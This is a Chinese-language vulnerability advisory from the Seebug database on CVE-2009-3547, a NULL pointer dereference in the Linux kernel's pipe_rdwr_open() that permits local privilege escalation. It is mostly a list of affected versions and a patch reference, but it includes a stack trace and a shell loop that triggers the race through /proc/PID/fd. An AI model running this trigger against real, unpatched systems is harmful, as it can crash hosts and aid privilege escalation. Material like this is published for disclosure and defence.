Lucene search

RootSSV:12576

HistoryNov 05, 2009 - 12:00 a.m.

Linux内核'pipe.c'本地特权提升漏洞

2009-11-0500:00:00

Root

www.seebug.org

0.0004 Low

EPSS

Percentile

5.8%

JSON

Bugraq ID: 36901
CVE ID：CVE-2009-3547

Linux是一款开放源代码的操作系统。
Linux Kernel 'pipe.c’存在一个Null指针引用问题，本地攻击者可以利用漏洞提升特权。
pipe_rdwr_open()会触发Null指针异常生成如下堆栈跟踪：
> Unable to handle kernel NULL pointer dereference at 0000000000000028 RIP:
> [<ffffffff802899a5>] pipe_rdwr_open+0x35/0x70
> [<ffffffff8028125c>] __dentry_open+0x13c/0x230
> [<ffffffff8028143d>] do_filp_open+0x2d/0x40
> [<ffffffff802814aa>] do_sys_open+0x5a/0x100
> [<ffffffff8021faf3>] sysenter_do_call+0x1b/0x67
通过/proc/pid/fd/*打开匿名管道可触发此失败模式，可通过如下脚本例证：

while : ; do
{ echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
PID=$!
OUT=$(ps -efl | grep ‘sleep 1’ | grep -v grep |
{ read PID REST ; echo $PID; } )
OUT="${OUT%% }"
DELAY=$((RANDOM 1000 / 32768))
usleep $((DELAY * 1000 + RANDOM % 1000 ))
echo n > /proc/$OUT/fd/1 # Trigger defect
done

注意这个失败窗口很小，要稳定重新这个缺陷需要在pipe_rdwr_open()中插入少量延迟:
static int
pipe_rdwr_open(struct inode *inode, struct file *filp)
{
msleep(100);
mutex_lock(&inode->i_mutex)

虽然这个缺陷发现于pipe_rdwr_open()函数中，但其他pipe_*_open()函数也应该存在此漏洞。
补丁会对尝试操作inode->i_pipe之前，对inode->i_pipe是否释放进行检查，如果inode->i_pipe不存在了，将返回ENOENT进行提示。

RedHat Enterprise MRG v1 for Red Hat Enterprise Linux version 5
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux Desktop version 4
RedHat Enterprise Linux 5 server
RedHat Desktop 3.0
Linux kernel 2.6.31 5
Linux kernel 2.6.31 .2
Linux kernel 2.6.31 -rc7
Linux kernel 2.6.31 -rc6
Linux kernel 2.6.31 -rc3

Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.31 -rc1
Linux kernel 2.6.31
Linux kernel 2.6.30 rc6
Linux kernel 2.6.30 1
Linux kernel 2.6.30 -rc5
Linux kernel 2.6.30 -rc3
Linux kernel 2.6.30 -rc2
Linux kernel 2.6.30 -rc1
Linux kernel 2.6.30
Linux kernel 2.6.29 4
Linux kernel 2.6.29 1
Linux kernel 2.6.29 -git8
Linux kernel 2.6.29 -git14
Linux kernel 2.6.29 -git1
Linux kernel 2.6.29
Linux kernel 2.6.28 9
Linux kernel 2.6.28 8
Linux kernel 2.6.28 6
Linux kernel 2.6.28 5
Linux kernel 2.6.28 3
Linux kernel 2.6.28 2
Linux kernel 2.6.28 1
Linux kernel 2.6.28 -rc7
Linux kernel 2.6.28 -rc5
Linux kernel 2.6.28 -rc1
Linux kernel 2.6.28 -git7
Linux kernel 2.6.28
Linux kernel 2.6.27 6
Linux kernel 2.6.27 3
Linux kernel 2.6.27 24
Linux kernel 2.6.27 14
Linux kernel 2.6.27 13
Linux kernel 2.6.27 12
Linux kernel 2.6.27 12
Linux kernel 2.6.27 .8
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 -rc8-git5
Linux kernel 2.6.27 -rc8
Linux kernel 2.6.27 -rc6-git6
Linux kernel 2.6.27 -rc6
Linux kernel 2.6.27 -rc5
Linux kernel 2.6.27 -rc2
Linux kernel 2.6.27 -rc1
Linux kernel 2.6.27
Linux kernel 2.6.26 7
Linux kernel 2.6.26 4
Linux kernel 2.6.26 3
Linux kernel 2.6.26 .6
Linux kernel 2.6.26 -rc6
Linux kernel 2.6.26
Linux kernel 2.6.25 19
Linux kernel 2.6.25 .9
Linux kernel 2.6.25 .8
Linux kernel 2.6.25 .7
Linux kernel 2.6.25 .6
Linux kernel 2.6.25 .5
Linux kernel 2.6.25 .15
Linux kernel 2.6.25 .13
Linux kernel 2.6.25 .12
Linux kernel 2.6.25 .11
Linux kernel 2.6.25 .10
Linux kernel 2.6.25
Linux kernel 2.6.25
Linux kernel 2.6.24 .2
Linux kernel 2.6.24 .1
Linux kernel 2.6.24 -rc5
Linux kernel 2.6.24 -rc4
Linux kernel 2.6.24 -rc3
Linux kernel 2.6.24 -git13
Linux kernel 2.6.24
Linux kernel 2.6.23 .7
Linux kernel 2.6.23 .6
Linux kernel 2.6.23 .5
Linux kernel 2.6.23 .4
Linux kernel 2.6.23 .3
Linux kernel 2.6.23 .2
Linux kernel 2.6.23 -rc2
Linux kernel 2.6.23 -rc1
Linux kernel 2.6.23
Linux kernel 2.6.22 7
Linux kernel 2.6.22 1
Linux kernel 2.6.22 .8
Linux kernel 2.6.22 .6
Linux kernel 2.6.22 .5
Linux kernel 2.6.22 .4
Linux kernel 2.6.22 .3
Linux kernel 2.6.22 .17
Linux kernel 2.6.22 .16
Linux kernel 2.6.22 .15
Linux kernel 2.6.22 .14
Linux kernel 2.6.22 .13
Linux kernel 2.6.22 .12
Linux kernel 2.6.22 .11
Linux kernel 2.6.22
Linux kernel 2.6.22
Linux kernel 2.6.21 4
Linux kernel 2.6.21 .7
Linux kernel 2.6.21 .6
Linux kernel 2.6.21 .2
Linux kernel 2.6.21 .1
Linux kernel 2.6.21
Linux kernel 2.6.21
Linux kernel 2.6.21
Linux kernel 2.6.20 .9
Linux kernel 2.6.20 .8
Linux kernel 2.6.20 .5
Linux kernel 2.6.20 .4
Linux kernel 2.6.20 .15
Linux kernel 2.6.20 -git5
Linux kernel 2.6.20
Linux kernel 2.6.20
Linux kernel 2.6.19 1
Linux kernel 2.6.19 .2
Linux kernel 2.6.19 .1
Linux kernel 2.6.19 -rc4
Linux kernel 2.6.19 -rc3
Linux kernel 2.6.19 -rc2
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc1
Linux kernel 2.6.19
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.18 .4
Linux kernel 2.6.18 .3
Linux kernel 2.6.18 .1
Linux kernel 2.6.18
Linux kernel 2.6.17 .8
Linux kernel 2.6.17 .7
Linux kernel 2.6.17 .6
Linux kernel 2.6.17 .5
Linux kernel 2.6.17 .3
Linux kernel 2.6.17 .2
Linux kernel 2.6.17 .14
Linux kernel 2.6.17 .13
Linux kernel 2.6.17 .12
Linux kernel 2.6.17 .11
Linux kernel 2.6.17 .10
Linux kernel 2.6.17 .1
Linux kernel 2.6.17 -rc5
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.16 27
Linux kernel 2.6.16 13
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .7
Linux kernel 2.6.16 .23
Linux kernel 2.6.16 .19
Linux kernel 2.6.16 .12
Linux kernel 2.6.16 .11
Linux kernel 2.6.16 .1
Linux kernel 2.6.16 -rc1
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15 -rc3
Linux kernel 2.6.15 -rc2
Linux kernel 2.6.15 -rc1
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14 -rc4
Linux kernel 2.6.14 -rc3
Linux kernel 2.6.14 -rc2
Linux kernel 2.6.14 -rc1
Linux kernel 2.6.14
Linux kernel 2.6.14
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13 -rc7
Linux kernel 2.6.13 -rc6
Linux kernel 2.6.13 -rc4
Linux kernel 2.6.13 -rc1
Linux kernel 2.6.13
Linux kernel 2.6.13
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .22
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .12
Linux kernel 2.6.12 .1
Linux kernel 2.6.12 -rc5
Linux kernel 2.6.12 -rc4
Linux kernel 2.6.12 -rc1
Linux kernel 2.6.12
Linux kernel 2.6.12
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .4
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
Linux kernel 2.6.11
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
Linux kernel 2.6.10
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.6.8.1
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.32-rc5
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.32-rc4
Linux kernel 2.6.32-rc3
Linux kernel 2.6.32-rc2
Linux kernel 2.6.32-rc1
Linux kernel 2.6.31.4
Linux kernel 2.6.31.2
Linux kernel 2.6.31-rc9
Linux kernel 2.6.31-rc8
Linux kernel 2.6.31-rc7
Linux kernel 2.6.31-rc5-git3
Linux kernel 2.6.31-rc2
Linux kernel 2.6.31-git11
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.30.5
Linux kernel 2.6.30.4
Linux kernel 2.6.30.3
Linux kernel 2.6.29-rc2-git1
Linux kernel 2.6.29-rc2
Linux kernel 2.6.29-rc1
Linux kernel 2.6.28.4
Linux kernel 2.6.26.1
Linux kernel 2.6.26-rc5-git1
Linux kernel 2.6.25.4
Linux kernel 2.6.25.3
Linux kernel 2.6.25.2
Linux kernel 2.6.25.1
Linux kernel 2.6.25-rc1
Linux kernel 2.6.24.6
Linux kernel 2.6.24-rc2
Linux kernel 2.6.24-rc1
Linux kernel 2.6.23.14
Linux kernel 2.6.23.10
Linux kernel 2.6.23.1
Linux kernel 2.6.23.09
Linux kernel 2.6.22-rc7
Linux kernel 2.6.22-rc1
Linux kernel 2.6.21-RC6
Linux kernel 2.6.21-RC5
Linux kernel 2.6.21-RC4
Linux kernel 2.6.21-RC3
Linux kernel 2.6.21-RC3
Linux kernel 2.6.20.3
Linux kernel 2.6.20.2
Linux kernel 2.6.20.13
Linux kernel 2.6.20.11
Linux kernel 2.6.20.1
Linux kernel 2.6.20-rc2
Linux kernel 2.6.20-2
Linux kernel 2.6.19 -rc6
Linux kernel 2.6.18-8.1.8.el5
Linux kernel 2.6.18-53
Linux kernel 2.6.18
Linux kernel 2.6.15.5
Linux kernel 2.6.15.11
Linux kernel 2.6.15-27.48
Linux kernel 2.6.11.4
厂商解决方案
用户可参考如下补丁程序：
http://lkml.org/lkml/2009/10/21/42